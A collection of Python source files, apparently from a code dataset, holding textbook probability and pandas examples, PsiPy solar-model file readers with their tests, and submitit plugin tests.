diffs.append(abs(num_heads - num_tails))
ratios_means.append(sum(ratios)/num_trials)
diffs_means.append(sum(diffs)/num_trials)
ratios_SDs.append(std_dev(ratios))
diffs_SDs.append(std_dev(diffs))
ratios_CVs.append(CV(ratios))
diffs_CVs.append(CV(diffs))
num_trials_str = ' (' + str(num_trials) + ' Trials)'
title = 'Mean Heads/Tails Ratios' + num_trials_str
make_plot(x_axis, ratios_means, title, 'Number of flips',
'Mean Heads/Tails', 'ko', log_x = True)
title = 'SD Heads/Tails Ratios' + num_trials_str
make_plot(x_axis, ratios_SDs, title, 'Number of flips',
'Standard Deviation', 'ko', log_x = True, log_y = True)
title = 'Mean abs(#Heads - #Tails)' + num_trials_str
make_plot(x_axis, diffs_means, title,'Number of Flips',
'Mean abs(#Heads - #Tails)', 'ko',
log_x = True, log_y = True)
title = 'SD abs(#Heads - #Tails)' + num_trials_str
make_plot(x_axis, diffs_SDs, title, 'Number of Flips',
'Standard Deviation', 'ko', log_x = True, log_y = True)
title = 'Coeff. of Var. abs(#Heads - #Tails)' + num_trials_str
make_plot(x_axis, diffs_CVs, title, 'Number of Flips',
'Coeff. of Var.', 'ko', log_x = True)
title = 'Coeff. of Var. Heads/Tails Ratio' + num_trials_str
make_plot(x_axis, ratios_CVs, title, 'Number of Flips',
'Coeff. of Var.', 'ko', log_x = True, log_y = True)
# flip_plot2(4, 20, 20)
# # Code from Figure 17-19 on page 366
# random.seed(0)
# vals = []
# for i in range(1000):
# num1 = random.choice(range(0, 101))
# num2 = random.choice(range(0, 101))
# vals.append(num1 + num2)
# plt.hist(vals, bins = 10, ec = 'k')
# plt.xlabel('Sum')
# plt.ylabel('Number of Occurrences')
# # Code from Figure 17-20 on page 368
def flip(num_flips):
"""Assumes num_flips a positive int"""
heads = 0
for i in range(num_flips):
if random.choice(('H', 'T')) == 'H':
heads += 1
return heads/float(num_flips)
def flip_sim(num_flips_per_trial, num_trials):
frac_heads = []
for i in range(num_trials):
frac_heads.append(flip(num_flips_per_trial))
mean = sum(frac_heads)/len(frac_heads)
sd = std_dev(frac_heads)
return (frac_heads, mean, sd)
def label_plot(num_flips, num_trials, mean, sd):
plt.title(str(num_trials) + ' trials of '
+ str(num_flips) + ' flips each')
plt.xlabel('Fraction of Heads')
plt.ylabel('Number of Trials')
plt.annotate('Mean = ' + str(round(mean, 4))
+ '\nSD = ' + str(round(sd, 4)), size='x-large',
xycoords = 'axes fraction', xy = (0.67, 0.5))
def make_plots(num_flips1, num_flips2, num_trials):
val1, mean1, sd1 = flip_sim(num_flips1, num_trials)
plt.hist(val1, bins = 20)
x_min,x_max = plt.xlim()
label_plot(num_flips1, num_trials, mean1, sd1)
plt.figure()
val2, mean2, sd2 = flip_sim(num_flips2, num_trials)
plt.hist(val2, bins = 20, ec = 'k')
plt.xlim(x_min, x_max)
label_plot(num_flips2, num_trials, mean2, sd2)
# random.seed(0)
# make_plots(100, 1000, 100000)
# # Code to produce plot in Figure 17-25 on page 374
# plt.plot([0,5], [0,5])
# plt.xlim(0,5)
# plt.ylim(0,5)
# plt.title('abs(x)')
#Figure 15.23
# print(scipy.integrate.quad(abs, 0, 5)[0])
# print(scipy.integrate.quad(abs, 0, 5)[1])
# # Figure 17-26 on page 375
def gaussian(x, mu, sigma):
"""assumes x, mu, sigma numbers
returns the value of P(x) for a Gaussian
with mean mu and sd sigma"""
factor1 = (1.0/(sigma*((2*np.pi)**0.5)))
factor2 = np.e**-(((x-mu)**2)/(2*sigma**2))
return factor1*factor2
def check_empirical(mu_max, sigma_max, num_trials):
"""assumes mu_max, sigma_max, num_trials positive ints
prints fraction of values of a Gaussians (with randomly
chosen mu and sigman) falling within 1, 2, 3 standard
deviations"""
for t in range(num_trials):
mu = random.randint(-mu_max, mu_max + 1)
sigma = random.randint(1, sigma_max)
print('For mu =', mu, 'and sigma =', sigma)
for num_std in (1, 2, 3):
area = scipy.integrate.quad(gaussian, mu-num_std*sigma,
mu+num_std*sigma,
(mu, sigma))[0]
print(' Fraction within', num_std, 'std =',
round(area, 4))
# random.seed(0)
# check_empirical(10, 10, 3)
# # Code on bottom of p[age 374]
# for x in range(-2, 3):
# print(gaussian(x, 0, 1))
# # Code on top of page 375
# print(scipy.integrate.quad(gaussian, -1, 1, (0, 1))[0])
# # Figure 17-27 on page 377
def show_error_bars(min_exp, max_exp, num_trials):
"""Assumes min_exp and max_exp positive ints; min_exp < max_exp
num_trials a positive integer
Plots mean fraction of heads with error bars"""
means, sds, x_vals = [], [], []
for exp in range(min_exp, max_exp + 1):
x_vals.append(2**exp)
frac_heads, mean, sd = flip_sim(2**exp, num_trials)
means.append(mean)
sds.append(sd)
plt.errorbar(x_vals, means, yerr=1.96*np.array(sds))
plt.semilogx()
plt.title('Mean Fraction of Heads ('
+ str(num_trials) + ' trials)')
plt.xlabel('Number of flips per trial')
plt.ylabel('Fraction of heads & 95% confidence')
# show_error_bars(3, 10, 100)
# # Figure 17-29 on page 382
def clear(n, p, steps):
"""Assumes n & steps positive ints, p a float
n: the initial number of molecules
p: the probability of a molecule being cleared
steps: the length of the simulation"""
num_remaining = [n]
for t in range(steps):
num_remaining.append(n*((1-p)**t))
plt.plot(num_remaining)
plt.xlabel('Time')
plt.ylabel('Molecules Remaining')
plt.title('Clearance of Drug')
# clear(1000, 0.01, 1000)
# # Code suggested at top of page 383
# plt.semilogy()
# # Figure 17-32 on page 384
def successful_starts(success_prob, num_trials):
"""Assumes success_prob is a float representing probability of a
single attempt being successful. num_trials a positive int
Returns a list of the number of attempts needed before a
success for each trial."""
tries_before_success = []
for t in range(num_trials):
consec_failures = 0
while random.random() > success_prob:
consec_failures += 1
tries_before_success.append(consec_failures)
return tries_before_success
# prob_of_success = 0.5
# num_trials = 5000
# distribution = successful_starts(prob_of_success, num_trials)
# plt.hist(distribution, bins = 14)
# plt.xlabel('Tries Before Success')
# plt.ylabel('Number of Occurrences Out of ' + str(num_trials))
# plt.title('Probability of Starting Each Try = '
# + str(prob_of_success))
# # Code on page 387
def collision_prob(n, k):
prob = 1.0
for i in range(1, k):
prob = prob * ((n - i)/n)
return 1 - prob
# print(collision_prob(1000, 50))
# print(collision_prob(1000, 200))
# # Figure 17-34 on page 388
def sim_insertions(num_indices, num_insertions):
"""Assumes num_indices and num_insertions are positive ints.
Returns 1 if there is a collision; 0 otherwise"""
choices = range(num_indices) #list of possible indices
used = []
for i in range(num_insertions):
hash_val = random.choice(choices)
if hash_val in used: #there is a collision
return 1
else:
used.append(hash_val)
return 0
def find_prob(num_indices, num_insertions, num_trials):
collisions = 0
for t in range(num_trials):
collisions += sim_insertions(num_indices, num_insertions)
return collisions/num_trials
# # Code on page 388
# print('Actual probability of a collision =', collision_prob(1000, 50))
# print('Est. probability of a collision =', find_prob(1000, 50, 10000))
# print('Actual probability of a collision =', collision_prob(1000, 200))
# print('Est. probability of a collision =', find_prob(1000, 200, 10000))
# # Figure 17-35 on page 390
def play_series(num_games, team_prob):
numWon = 0
for game in range(num_games):
if random.random() <= team_prob:
numWon += 1
return (numWon > num_games//2)
def fraction_won(team_prob, num_series, series_len):
won = 0
for series in range(num_series):
if play_series(series_len, team_prob):
won += 1
return won/float(num_series)
def sim_series(num_series):
prob = 0.5
fracsWon, probs = [], []
while prob <= 1.0:
fracsWon.append(fraction_won(prob, num_series, 7))
probs.append(prob)
prob += 0.01
plt.axhline(0.95) #Draw line at 95%
plt.plot(probs, fracsWon, 'k', linewidth = 5)
plt.xlabel('Probability of Winning a Game')
plt.ylabel('Probability of Winning a Series')
plt.title(str(num_series) + ' Seven-Game Series')
# sim_series(400)
```
#### File: code/chapter 18/chapter18.py
```python
import random
import numpy as np
# # Figure 18-1 on page 396
def roll_die():
return random.choice([1,2,3,4,5,6])
# #Used later in chapter
# def roll_die():
# return random.choice([1,1,2,3,3,4,4,5,5,5,6,6])
def check_pascal(num_trials):
"""Assumes num_trials is an int > 0
Prints an estimate of the probability of winning"""
num_wins = 0
for i in range(num_trials):
for j in range(24):
d1 = roll_die()
d2 = roll_die()
if d1 == 6 and d2 == 6:
num_wins += 1
break
print('Probability of winning =', num_wins/num_trials)
# check_pascal(1000000)
# # Figure 18-2 on page 397
class Craps_game(object):
def __init__(self):
self.pass_wins, self.pass_losses = 0, 0
self.dp_wins, self.dp_losses, self.dp_pushes = 0, 0, 0
def play_hand(self):
throw = roll_die() + roll_die()
if throw == 7 or throw == 11:
self.pass_wins += 1
self.dp_losses += 1
elif throw == 2 or throw == 3 or throw == 12:
self.pass_losses += 1
if throw == 12:
self.dp_pushes += 1
else:
self.dp_wins += 1
else:
point = throw
while True:
throw = roll_die() + roll_die()
if throw == point:
self.pass_wins += 1
self.dp_losses += 1
break
elif throw == 7:
self.pass_losses += 1
self.dp_wins += 1
break
def pass_results(self):
return (self.pass_wins, self.pass_losses)
def dp_results(self):
return (self.dp_wins, self.dp_losses, self.dp_pushes)
def craps_sim(hands_per_game, num_games):
"""Assumes hands_per_game and num_games are ints > 0
Play num_games games of hands_per_game hands; print results"""
games = []
#Play num_games games
for t in range(num_games):
c = Craps_game()
for i in range(hands_per_game):
c.play_hand()
games.append(c)
#Produce statistics for each game
p_ROI_per_game, dp_ROI_per_game = [], []
for g in games:
wins, losses = g.pass_results()
p_ROI_per_game.append((wins - losses)/float(hands_per_game))
wins, losses, pushes = g.dp_results()
dp_ROI_per_game.append((wins - losses)/float(hands_per_game))
#Produce and print summary statistics
mean_ROI = str(round((100*sum(p_ROI_per_game)/num_games), 4)) + '%'
sigma = str(round(100*np.std(p_ROI_per_game), 4)) + '%'
print('Pass:', 'Mean ROI =', mean_ROI, 'Std. Dev. =', sigma)
mean_ROI = str(round((100*sum(dp_ROI_per_game)/num_games), 4)) +'%'
sigma = str(round(100*np.std(dp_ROI_per_game), 4)) + '%'
print('Don\'t pass:','Mean ROI =', mean_ROI, 'Std Dev =', sigma)
# # Code from page 400
# craps_sim(20, 10)
# craps_sim(1000000, 10)
# # Code from page 401
# craps_sim(20, 1000000)
# # Class with version of play_hand from Figure 18-4 on page 403
class Craps_game(object):
def __init__(self):
self.pass_wins, self.pass_losses = 0, 0
self.dp_wins, self.dp_losses, self.dp_pushes = 0, 0, 0
def play_hand(self):
#An alternative, faster, implementation of play_hand
points_dict = {4:1/3, 5:2/5, 6:5/11, 8:5/11, 9:2/5, 10:1/3}
throw = roll_die() + roll_die()
if throw == 7 or throw == 11:
self.pass_wins += 1
self.dp_losses += 1
elif throw == 2 or throw == 3 or throw == 12:
self.pass_losses += 1
if throw == 12:
self.dp_pushes += 1
else:
self.dp_wins += 1
else:
if random.random() <= points_dict[throw]: # point before 7
self.pass_wins += 1
self.dp_losses += 1
else: # 7 before point
self.pass_losses += 1
self.dp_wins += 1
def pass_results(self):
return (self.pass_wins, self.pass_losses)
def dp_results(self):
return (self.dp_wins, self.dp_losses, self.dp_pushes)
# # Figure 18-6 from page 407
def throw_needles(num_needles):
in_circle = 0
for Needles in range(1, num_needles + 1):
x = random.random()
y = random.random()
if (x*x + y*y)**0.5 <= 1:
in_circle += 1
#Counting needles in one quadrant only, so multiply by 4
return 4*(in_circle/num_needles)
def get_est(num_needles, num_trials):
estimates = []
for t in range(num_trials):
pi_guess = throw_needles(num_needles)
estimates.append(pi_guess)
std_dev = np.std(estimates)
cur_est = sum(estimates)/len(estimates)
print('Est. =', str(round(cur_est, 5)) + ',',
'Std. dev. =', str(round(std_dev, 5)) + ',',
'Needles =', num_needles)
return (cur_est, std_dev)
def est_pi(precision, num_trials):
num_needles = 1000
std_dev = precision
while std_dev > precision/1.96:
cur_est, std_dev = get_est(num_needles, num_trials)
num_needles *= 2
return cur_est
# # Code from page 407
random.seed(0)
est_pi(0.01, 100)
```
#### File: code/chapter 23/chapt23.py
```python
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
#change defaults for plotting
#set line width
plt.rcParams['lines.linewidth'] = 4
#set font size for titles
plt.rcParams['axes.titlesize'] = 20
#set font size for labels on axes
plt.rcParams['axes.labelsize'] = 20
#set size of numbers on x-axis
plt.rcParams['xtick.labelsize'] = 16
#set size of numbers on y-axis
plt.rcParams['ytick.labelsize'] = 16
#set size of ticks on x-axis
plt.rcParams['xtick.major.size'] = 7
#set size of ticks on y-axis
plt.rcParams['ytick.major.size'] = 7
#set size of markers, e.g., circles representing points
#set numpoints for legend
plt.rcParams['legend.numpoints'] = 1
#set parameters for saving figures
plt.rcParams['savefig.dpi'] = 1000
# plt.rcParams['savefig.bbox'] = 'tight'
plt.rcParams['savefig.pad_inches'] = 0
# # Code on page 512
# wwc = pd.read_csv('wwc2019_q-f.csv')
# print(wwc.to_string())
# # Code on page 513
# for i in wwc.index:
# print(i)
# # Code on page 514
# for c in wwc.columns:
# print(c)
# print(wwc.values)
# # Code on page 515
# print(pd.DataFrame())
# rounds = ['Semis', 'Semis', '3rd Place', 'Championship']
# print(pd.DataFrame(rounds))
# print(pd.DataFrame({'Round': rounds}))
# rounds = ['Semis', 'Semis', '3rd Place', 'Championship']
# teams = ['USA', 'Netherlands', 'Sweden', 'USA']
# df = pd.DataFrame({'Round': rounds, 'Winner': teams})
# print(df)
#
# Code on page 516
# df['W Goals'] = [2, 1, 0, 0]
# print(df)
# df['W Goals'] = [2, 1, 2, 2]
# print(df)
# print(df.drop('Winner', axis = 'columns'))
# # Code on page 517
# quarters_dict = {'Round': ['Quarters']*4,
# 'Winner': ['England', 'USA', 'Netherlands', 'Sweden'],
# 'W Goals': [3, 2, 2, 2]}
# df = pd.concat([pd.DataFrame(quarters_dict), df], sort = False)
# print(df.to_string())
# print(pd.concat([pd.DataFrame(quarters_dict), df], sort = True).to_string())
# # Code on page 518
# print(df.reset_index(drop = True).to_string())
# print(df.set_index('Round').to_string())
# print(wwc['Winner'].to_string())
# # Code on page 519
# print(wwc['Winner'][3])
# winners = ''
# for w in wwc['Winner']:
# winners += w + ','
# print(winners[:-1])
# print(wwc[['Winner', 'Loser']].to_string())
# # Code on page 520
# print(wwc[['Round','Winner','Loser','W Goals','L Goals']].to_string())
# print(wwc[1:2])
# print(wwc.loc[3])
# # Code on page 521
# print(wwc.loc[[1,3,5]])
# print(wwc.loc[3:7:2])
# print(wwc.loc[6:])
# # Code on page 522
# print(wwc.loc[:2])
# print(wwc.loc[0:2, 'Round':'L Goals':2])
# wwc_by_round = wwc.set_index('Round')
# print(wwc_by_round.to_string())
# # Code on page 523
# print(wwc_by_round.loc['Semis'])
# print(wwc_by_round.loc[['Semis', 'Championship']])
# print(wwc_by_round.loc['Quarters':'Semis':2])
# print(wwc_by_round.iloc[[1,2]])
# # Code on page 524
# grouped_by_round = wwc.groupby('Round')
# print(grouped_by_round.sum())
# print(wwc.groupby('Winner').mean())
# # Code on page 525
# print(wwc.groupby(['Loser', 'Round']).mean())
# print(wwc.loc[wwc['Winner'] == 'Sweden'])
# print(wwc.loc[(wwc['Winner'] == 'Sweden') | (wwc['Loser'] == 'Sweden')])
# # Code on page 526
def get_country(df, country):
"""df a DataFrame with series labeled Winner and Loser
country a str
returns a DataFrame with all rows in which country appears
in either the Winner or Loser column"""
return df.loc[(df['Winner'] == country) | (df['Loser'] == country)]
# print(get_country(get_country(wwc, 'Sweden'),'Germany'))
def get_games(df, countries):
return df[(df['Winner'].isin(countries) |
df['Loser'].isin(countries))]
# # Code on page 527
# print(wwc['W Goals'].sum())
# print((wwc[wwc['Winner'] == 'Sweden']['W Goals'].sum() +
# wwc[wwc['Winner'] == 'Sweden']['L Goals'].sum()))
# print((wwc['W Goals'].sum() - wwc['L Goals'].sum())/len(wwc['W Goals']))
# # Code on page 528
# wwc['G Diff'] = wwc['W Goals'] - wwc['L Goals']
# print(wwc)
# # Add new column to wwc
# wwc['G Diff'] = wwc['W Goals'] - wwc['L Goals']
# # create a dict with values for new row
# new_row_dict = {'Round': ['Total'],
# 'W Goals': [wwc['W Goals'].sum()],
# 'L Goals': [wwc['L Goals'].sum()],
# 'G Diff': [wwc['G Diff'].sum()]}
# # Create DataFrame from dict, then pass it to concat
# new_row = pd.DataFrame(new_row_dict)
# wwc = pd.concat([wwc, new_row], sort = False).reset_index(drop = True)
# print(wwc.to_string())
# # Code on page 529
# print(wwc.loc[wwc['Round'] != 'Total'].corr(method = 'pearson'))
# # Code on page 530
# pd.set_option('display.max_rows', 6)
# pd.set_option('display.max_columns', 5)
# temperatures = pd.read_csv('US_temperatures.csv')
# print(temperatures)
# # Code on page 531
# print(temperatures.loc[temperatures['Date']==19790812][['New York','Tampa']])
# temperatures['Max T'] = temperatures.max(axis = 'columns')
# temperatures['Min T'] = temperatures.min(axis = 'columns')
# temperatures['Mean T'] = round(temperatures.mean(axis = 'columns'), 2)
# print(temperatures.loc[temperatures['Date']==20000704])
# # code from page 532
# # Read in file again, because above code modified temperatures
# temperatures = pd.read_csv('US_temperatures.csv')
# temperatures.set_index('Date', drop = True, inplace = True)
# temperatures['Max T'] = temperatures.max(axis = 'columns')
# temperatures['Min T'] = temperatures.min(axis = 'columns')
# temperatures['Mean T'] = round(temperatures.mean(axis = 'columns'), 2)
# print(temperatures.loc[20000704:20000704])
# plt.figure(figsize = (14, 3)) #set aspect ratio for figure
# plt.plot(list(temperatures['Mean T']))
# plt.title('Mean Temp Across 21 US Cities')
# plt.xlabel('Days Since 1/1/1961')
# plt.ylabel('Degrees C')
# plt.figure(figsize = (14, 3)) #set aspect ratio for figure
# plt.plot(list(temperatures['Mean T'])[0:3*365])
# plt.title('Mean Temp Across 21 US Cities')
# plt.xlabel('Days Since 1/1/1961')
# plt.ylabel('Degrees C')
# # Figure 23-3 from page 534
def get_dict(temperatures, labels):
"""temperatures a DataFrame. Its indices are ints
representing dates of the form yyyymmdd
labels a list of column labels
returns a dict with strs representing years as keys,
the values dicts with the columns as keys, and
a list of the daily temperatures in that column for
that year as values
"""
year_dict = {}
for index, row in temperatures.iterrows():
year = str(index)[0:4]
try:
for col in labels:
year_dict[year][col].append(row[col])
except:
year_dict[year] = {col:[] for col in labels}
for col in labels:
year_dict[year][col].append(row[col])
return year_dict
# # Code from page 535
temperatures = pd.read_csv('US_temperatures.csv')
temperatures.set_index('Date', drop = True, inplace = True)
temperatures['Mean T'] = round(temperatures.mean(axis = 'columns'), 2)
temperatures['Max T'] = temperatures.max(axis = 'columns')
temperatures['Min T'] = temperatures.min(axis = 'columns')
yearly_dict = get_dict(temperatures, ['Max T', 'Min T', 'Mean T'])
years, mins, maxes, means = [], [], [], []
for y in yearly_dict:
years.append(y)
mins.append(min(yearly_dict[y]['Min T']))
maxes.append(max(yearly_dict[y]['Max T']))
means.append(round(np.mean(yearly_dict[y]['Mean T']), 2))
yearly_temps = pd.DataFrame({'Year': years, 'Min T': mins,
'Max T': maxes, 'Mean T': means})
print(yearly_temps)
# Figure 23-5 from page 536
# plt.figure(0)
# plt.plot(yearly_temps['Year'], yearly_temps['Mean T'])
# plt.title('Mean Annual Temp in 21 U.S. Cities')
# plt.figure(1)
# plt.plot(yearly_temps['Year'], yearly_temps['Min T'])
# plt.title('Min Annual Temp in 21 U.S. Cities')
# for i in range(2):
# plt.figure(i)
# plt.xticks(range(0, len(yearly_temps), 4),
# rotation = 'vertical', size = 'large')
# plt.ylabel('Degrees C')
# # Figure 23-5 modified as shown on page 537
# plt.figure(0)
# plt.plot(yearly_temps['Year'], yearly_temps['Mean T'])
# plt.title('Mean Annual Temp in 21 U.S. Cities')
# plt.figure(1)
# plt.plot(yearly_temps['Min T'].rolling(7).mean())
# plt.title('Min Annual Temp in 21 U.S. Cities')
# for i in range(2):
# plt.figure(i)
# plt.xticks(range(0, len(yearly_temps), 4),
# rotation = 'vertical', size = 'large')
# plt.ylabel('Degrees C')
# # Code from page 537
# num_years = 7
# for label in ['Min T', 'Max T', 'Mean T']:
# yearly_temps[label] = yearly_temps[label].rolling(num_years).mean()
# yearly_temps['Year'] = yearly_temps['Year'].apply(int)
# print(yearly_temps.corr())
# # Implementation fo r_squared from Section 20.2.1
def r_squared(measured, predicted):
"""Assumes measured a one-dimensional array of measured values
predicted a one-dimensional array of predicted values
Returns coefficient of determination"""
estimated_error = ((predicted - measured)**2).sum()
mean_of_measured = measured.sum()/len(measured)
variability = ((measured - mean_of_measured)**2).sum()
return 1 - estimated_error/variability
# # Code from page 538
# indices = np.isfinite(yearly_temps['Mean T'])
# model = np.polyfit(list(yearly_temps['Year'][indices]),
# list(yearly_temps['Mean T'][indices]), 1)
# print(r_squared(yearly_temps['Mean T'][indices],
# np.polyval(model, yearly_temps['Year'][indices])))
# # Code from page 539
# temperatures = pd.read_csv('US_temperatures.csv')
# temperatures.drop('Date', axis = 'columns', inplace = True)
# means = round(temperatures.mean(), 2)
# maxes = temperatures.max()
# mins = temperatures.min()
# city_temps = pd.DataFrame({'Min T':mins, 'Max T':maxes,
# 'Mean T':means})
# city_temps = city_temps.apply(lambda x: 1.8*x + 32)
# city_temps['Max-Min'] = city_temps['Max T'] - city_temps['Min T']
# print(city_temps.sort_values('Mean T', ascending = False).to_string())
# # Code from page 540
# plt.plot(city_temps.sort_values('Max-Min', ascending=False)['Min T'],
# 'b^', label = 'Min T')
# plt.plot(city_temps.sort_values('Max-Min', ascending=False)['Max T'],
# 'kx', label = 'Max T')
# plt.plot(city_temps.sort_values('Max-Min', ascending=False)['Mean T'],
# 'ro', label = 'Mean T')
# plt.xticks(rotation = 'vertical')
# plt.legend()
# plt.title('Variation in Extremal Daily\nTemperature 1961-2015')
# plt.ylabel('Degrees F')
# # Code from page 541
# emissions = pd.read_csv('global-fossil-fuel-consumption.csv')
# print(emissions)
# # Code from page 542
# emissions['Fuels'] = emissions.sum(axis = 'columns')
# emissions.drop(['Coal', 'Crude Oil', 'Natural Gas'], axis = 'columns',
# inplace = True)
# num_years = 5
# emissions['Roll F'] =\
# emissions['Fuels'].rolling(num_years).mean()
# emissions = emissions.round()
# plt.plot(emissions['Year'], emissions['Fuels'],
# label = 'Consumption')
# plt.plot(emissions['Year'], emissions['Roll F'],
# label = str(num_years) + ' Year Rolling Ave.')
# plt.legend()
# plt.title('Consumption of Fossil Fuels')
# plt.xlabel('Year')
# plt.ylabel('Consumption')
# # # Code from page 543
# yearly_temps['Year'] = yearly_temps['Year'].astype(int)
# merged_df = pd.merge(yearly_temps, emissions,
# left_on = 'Year', right_on = 'Year')
# print(merged_df)
print(merged_df.corr().round(2).to_string())
``` |
{
"source": "jj-gonzalez-aviles/PsiPy",
"score": 3
} |
#### File: psipy/io/mas.py
```python
import glob
from pathlib import Path
import numpy as np
import xarray as xr
from .util import read_hdf4, read_hdf5
__all__ = ['read_mas_file', 'get_mas_variables', 'convert_hdf_to_netcdf']
def get_mas_filenames(directory, var):
directory = Path(directory)
return sorted(glob.glob(str(directory / f'{var}[0-9][0-9][0-9].*')))
def read_mas_file(directory, var):
"""
Read in a set of MAS output files.
Parameters
----------
directory :
Directory to look in.
var : str
Variable name.
Returns
-------
data : xarray.DataArray
Loaded data.
"""
files = get_mas_filenames(directory, var)
if not len(files):
raise FileNotFoundError(f'Could not find file for variable "{var}" in '
f'directory {directory}')
if Path(files[0]).suffix == '.nc':
return xr.open_mfdataset(files, parallel=True)
data = [_read_mas(f, var) for f in files]
return xr.concat(data, dim='time')
def _read_mas(path, var):
"""
Read a single MAS file.
"""
f = Path(path)
if f.suffix == '.hdf':
data, coords = read_hdf4(f)
elif f.suffix == '.h5':
data, coords = read_hdf5(f)
dims = ['phi', 'theta', 'r', 'time']
# Convert from co-latitude to latitude
coords[1] = np.pi / 2 - np.array(coords[1])
# Add time
data = data.reshape(data.shape + (1,))
coords.append([get_timestep(path)])
data = xr.Dataset({var: xr.DataArray(data=data, coords=coords, dims=dims)})
return data
def convert_hdf_to_netcdf(directory, var):
"""
Read in a set of HDF files, and save them out to NetCDF files.
This is helpful to convert files for loading lazily using dask.
Warnings
--------
This will create a new set of files that same size as *all* the files
read in. Make sure you have enough disk space before using this function!
"""
files = get_mas_filenames(directory, var)
for f in files:
print(f'Processing {f}...')
f = Path(f)
data = _read_mas(f, var)
new_dir = (f.parent / '..' / 'netcdf').resolve()
new_dir.mkdir(exist_ok=True)
new_path = (new_dir / f.name).with_suffix('.nc')
data.to_netcdf(new_path)
del data
def get_mas_variables(path):
"""
Return a list of variables present in a given directory.
Parameters
----------
path :
Path to the folder containing the MAS data files.
Returns
-------
var_names : list
List of variable names present in the given directory.
"""
files = glob.glob(str(path / '*[0-9][0-9][0-9].*'))
# Get the variable name from the filename
# Here we take the filename before .hdf, and remove the last three
# characters which give the timestep
var_names = [Path(f).stem.split('.')[0][:-3] for f in files]
if not len(var_names):
raise FileNotFoundError(f'No variable files found in {path}')
# Use list(set()) to get unique values
return list(set(var_names))
def get_timestep(path):
"""
Extract the timestep from a given MAS output filename.
"""
return int(Path(path).stem[-3:])
```
#### File: io/tests/test_mas.py
```python
import pytest
import xarray as xr
from psipy.io import mas
from psipy.model import MASOutput
def test_read_mas_error(tmp_path):
with pytest.raises(FileNotFoundError):
mas.read_mas_file(tmp_path, 'rho')
with pytest.raises(FileNotFoundError):
mas.get_mas_variables(tmp_path)
def test_read_mas_file(mas_directory):
# Check that loading a single file works
data = mas.read_mas_file(mas_directory, 'rho')
assert isinstance(data, xr.Dataset)
assert 'rho' in data
def test_save_netcdf(mas_directory):
# Check that converting to netcdf works
mas.convert_hdf_to_netcdf(mas_directory, 'rho')
netcdf_dir = mas_directory / '..' / 'netcdf'
netcdf_model = MASOutput(netcdf_dir)
hdf_model = MASOutput(mas_directory)
assert netcdf_model._data == hdf_model._data
```
#### File: io/tests/test_util.py
```python
import pytest
from psipy.io import util
def test_HDF4_error(tmp_path):
with pytest.raises(FileNotFoundError):
util.HDF4File(tmp_path / 'not_a_file.hdf')
```
#### File: psipy/model/pluto.py
```python
import astropy.units as u
from psipy.io import get_pluto_variables, read_pluto_files
from .base import ModelOutput
__all__ = ['PLUTOOutput']
class PLUTOOutput(ModelOutput):
"""
The results from a single run of PLUTO.
This is a storage object that contains a number of `Variable` objects. It
is designed to be used like::
pluto_output = PLUTOOutput('directory')
br = pluto_output['br']
Notes
-----
Variables are loaded on demand. To see the list of available variables
use `PLUTOOutput.variables`, and to see the list of already loaded variables
use `PLUTOOutput.loaded_variables`.
"""
def get_unit(self, var):
return u.dimensionless_unscaled, 1
def get_variables(self):
return get_pluto_variables(self.path)
def load_file(self, var):
return read_pluto_files(self.path, var)
```
#### File: model/tests/test_mas.py
```python
import astropy.units as u
import numpy as np
import xarray as xr
from psipy.model import base
def test_mas_model(mas_model):
# Check that loading a single file works
assert isinstance(mas_model, base.ModelOutput)
assert "MAS output in directory" in str(mas_model)
assert 'rho' in str(mas_model)
rho = mas_model['rho']
assert isinstance(rho, base.Variable)
assert isinstance(rho.data, xr.DataArray)
assert rho.unit == u.N / u.cm**3
assert rho.n_timesteps == 1
assert str(rho) == """
Variable
--------
Name: rho
Grid size: (128, 111, 141) (phi, theta, r)
Timesteps: 1
"""
def test_persistance(mas_model):
# Check that a variable requested twice only makes one copy of the data in
# memory
rho1 = mas_model['rho']
rho2 = mas_model['rho']
# This checks that rho1 and rho2 reference the same underlying data
assert rho1 is rho2
def test_change_units(mas_model):
# Check that loading a single file works
rho = mas_model['rho']
assert rho.unit == u.N / u.cm**3
old_data = rho._data.copy()
rho.unit = u.N / u.m**3
assert rho.unit == u.N / u.m**3
assert np.allclose(rho._data.values, 1e6 * old_data.values)
```
#### File: model/tests/test_variable.py
```python
import pytest
from psipy.model import Variable
def test_var_error(mas_model):
with pytest.raises(RuntimeError, match='not in list of known variables'):
mas_model['not_a_var']
def test_radial_normalised(mas_model):
norm = mas_model['rho'].radial_normalized(-2)
assert isinstance(norm, Variable)
``` |
{
"source": "JJGO/submitit",
"score": 2
} |
#### File: submitit/core/test_plugins.py
```python
import logging
import re
from pathlib import Path
from typing import Any, Iterator
import pkg_resources
import pytest
from . import core, plugins
from .job_environment import JobEnvironment
@pytest.mark.parametrize("env", plugins.get_job_environments().values())
def test_env(env: JobEnvironment) -> None:
assert isinstance(env, JobEnvironment)
assert type(env).activated is not JobEnvironment.activated, "activated need to be overridden"
# We are not inside a submitit job
assert not env.activated()
assert type(env)._requeue is not JobEnvironment._requeue, "_requeue need to be overridden"
@pytest.mark.parametrize("ex", plugins.get_executors().values())
def test_executors(ex: core.Executor) -> None:
assert isinstance(ex, type)
assert issubclass(ex, core.Executor)
assert ex.affinity() >= -1
def test_finds_default_environments() -> None:
envs = plugins.get_job_environments()
assert len(envs) >= 3
assert "slurm" in envs
assert "local" in envs
assert "debug" in envs
def test_finds_default_executors() -> None:
ex = plugins.get_executors()
assert len(ex) >= 3
assert "slurm" in ex
assert "local" in ex
assert "debug" in ex
def test_job_environment_works(monkeypatch):
monkeypatch.setenv("_TEST_CLUSTER_", "slurm")
env = plugins.get_job_environment()
assert env.cluster == "slurm"
assert type(env).__name__ == "SlurmJobEnvironment"
env2 = JobEnvironment()
assert env2.cluster == "slurm"
assert type(env2).__name__ == "SlurmJobEnvironment"
def test_job_environment_raises_outside_of_job() -> None:
with pytest.raises(RuntimeError, match=r"which environment.*slurm.*local.*debug"):
plugins.get_job_environment()
class PluginCreator:
def __init__(self, tmp_path: Path, monkeypatch):
self.tmp_path = tmp_path
self.monkeypatch = monkeypatch
def add_plugin(self, name: str, entry_points: str, init: str):
plugin = self.tmp_path / name
plugin.mkdir(mode=0o777)
plugin_egg = plugin.with_suffix(".egg-info")
plugin_egg.mkdir(mode=0o777)
(plugin_egg / "entry_points.txt").write_text(entry_points)
(plugin / "__init__.py").write_text(init)
# also fix pkg_resources since it already has loaded old packages in other tests.
working_set = pkg_resources.WorkingSet([str(self.tmp_path)])
self.monkeypatch.setattr(pkg_resources, "iter_entry_points", working_set.iter_entry_points)
